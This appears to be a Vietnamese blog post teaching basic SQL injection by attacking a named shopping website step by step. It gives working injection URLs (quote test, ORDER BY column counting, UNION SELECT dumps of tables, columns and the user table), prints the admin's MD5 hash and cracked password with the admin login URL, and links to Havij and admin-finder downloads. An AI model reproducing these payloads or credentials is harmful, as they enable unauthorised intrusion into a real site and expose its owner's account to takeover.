Hướng dẫn khai thác lỗi cơ bản

Khai Thác Lỗi Cơ Bản

Victim:  http://www.shophangkhuyenmai.com/

Bước 1: Check lỗi: 

Thêm dấu ‘ sau đường link có dạng id=
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421'
Nếu giao diện website có  thay đổi. Chứng tỏ site bị lỗi.

Bước 2: Tìm số trường cột

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 1-- -   -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 15-- - ->  Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 16-- -  -> Giao diện website thay đổi.

      Số trường  cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421 thì mới xuất hiện ra các con số đẹp.




Chúng ta chú ý sẽ thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.

Bước 4: Xuất ra tên các tables trong database

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

Thông tin về tên các table thu được:

tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor


Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user).  Vì vậy soleil sẽ khai thác ở table này.

Bước 5: Xuất ra tên các colums chứa username và password

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -
     Lưu ý:  
-          0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
-          74626c5f75736572 là chữ tbl_user ở dạng hex.
-          Link convert các ký tự sang mã hex:
http://string-functions.com/string-hex.aspx

Thông tin về tên columns thu được:

id,uid,pwd        
               
Bước 6: Xuất ra thông tin về Username và Password

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -

0x2f

Thông tin về username và password được mã hóa md5 thu được:
admin/679115597bf9f763506dcc9a8e9e8e82         

      

Bước 7:  Crack Password và tìm link admin:

-          Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
Hoặc sử dụng google để tìm kiếm
              
-          Sử dụng các tool để tìm link admin: Havij, Web admin finder
Havij 1.5 free:  http://www.mediafire.com/?bcrs460vcu1vy2q
Web admin finder 2.5 : http://www.mediafire.com/?ogoclxe83no1xzg
Pass dải nén: ducdung.08clc
Hoac. Tìm. Trên google app web admin finder vs havij ..vv
Thông tin Soleil thu được:
Link admin:  http://www.shophangkhuyenmai.com/admin/
Username và password:   admin /  961980dt
Đức dũng by tiên akira

Previous
Next Post »